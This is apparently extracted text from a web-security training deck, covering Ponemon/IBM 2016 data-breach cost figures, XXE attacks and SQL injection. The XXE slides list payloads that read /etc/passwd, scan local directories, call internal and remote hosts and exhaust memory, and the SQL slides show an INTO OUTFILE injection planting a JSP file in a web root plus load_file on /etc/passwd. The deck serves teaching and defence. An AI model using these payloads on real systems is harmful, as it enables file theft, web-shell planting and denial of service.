2. 2
AGENDA
1. Theory.
1. Ponemon IBM report keynotes.
2. OWASP.
2. Practice.
1. XXE vector attack demo.
2. XXE in details. How to fix it.
3. WebGoat overview. Demo.
4. SQL injection. Injection points.
5. JS MITM. Anonymous proxies.
3. Vulnerabilities database. How to scan your project.
4. Best practices for team and company.
3. 3
IBM and Ponemon Institute are pleased to release the 2016 Cost of Data
Breach Study: Global Analysis.
Ponemon Institute:
• provides strategic consulting to private
and public sector organizations
interested in establishing or enhancing
their privacy, data protection, and
security practices.
• conducts independent research on
privacy, data protection and information
security policy
4. 4
The average per capita cost of data breach over three years expressedin US dollars for 12 country studies.
5. 5
The total average cost of a data breachfor 12 countries in this year’s study, US$ millions
9. 9
According to research, the average total cost of a data breach for the
383 companies participating in this research increased from $3.79 to
$4 million.
The average cost paid for each lost or stolen record containing
sensitive and confidential information increased from $154 in 2015 to
$158 in this year’s study.
• 383 companies in 12 countries
• $4 million is the average total cost of data breach
• 29% increase in total cost of data breach since 2013
• $158 is the average cost per lost or stolen record
• 15%percent increase in per capita cost since 2013
PONEMON REPORT SUMMARY
17. 17
<?xml version="1.0"?>
<!DOCTYPE company [
<!ENTITY % xxe SYSTEM "http://127.0.0.1:8889">
%xxe;]>
<?xml version="1.0"?>
<!DOCTYPE order [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<?xml version="1.0"?>
<!DOCTYPE order [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file://dev/random" >
]>
Local resource call with private IP
Get local file content
Random generator OOM
18. 18
<?xml version="1.0"?>
<!DOCTYPE company [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/" >
]>
<?xml version="1.0"?>
<!DOCTYPE company [
<!ELEMENT text (#PCDATA)>
<!ENTITY xxe SYSTEM
"http://www.site.com/lohika.txt">
]>
Remote resource call
Local FS scan
21. 21
The eXtensible Markup Language (XML)
eXploitable Markup Language
Extensible Markup Language, abbreviated XML, describes a class of data objects called XML
documents and partially describes the behavior of computer programs which process them. XML
is an application profile or restricted form of SGML, the Standard Generalized Markup Language [ISO
8879]. By construction, XML documents are conforming SGML documents.
XML documents are made up of storage units called entities, which contain either parsed or
unparsed data. Parsed data is made up of characters, some of which form character data, and some of
which form markup. Markup encodes a description of the document's storage layout and logical
structure. XML provides a mechanism to impose constraints on the storage layout and logical structure.
[Definition: A software module called an XML processor is used to read XML documents and
provide access to their content and structure.] [Definition: It is assumed that an XML processor is
doing its work on behalf of another module, called the application.] This specification describes the
required behavior of an XML processor in terms of how it must read XML data and the information it must
provide to the application.
<, %, >, null-byte
no binary (must be UTF-8/16 data)
32. 32
Write into file:
1 LIMIT 1 into OUTFILE ‘/var/www/root/test.jsp’ FIELDS ENCLOSED BY ‘/’ LINES TERMINATED BY ‘n<%jsp code here%>’;
Results are stored in a file with rw-rw-rw privileges owned by MySQL
user and group.
Where /var/www/root/test.jsp will contain:
/field values/
<%jsp code here%>
select load_file('/etc/passwd');
Read from a File
load_file is a native function that can read a file when allowed by the
file system permissions. If a connected user has FILE privileges, it could
be used to get the files’ content.
load_file(‘filename’)
Out of band SQL Injection
Out of band injection could be accomplished by using the ‘into out- file’ clause.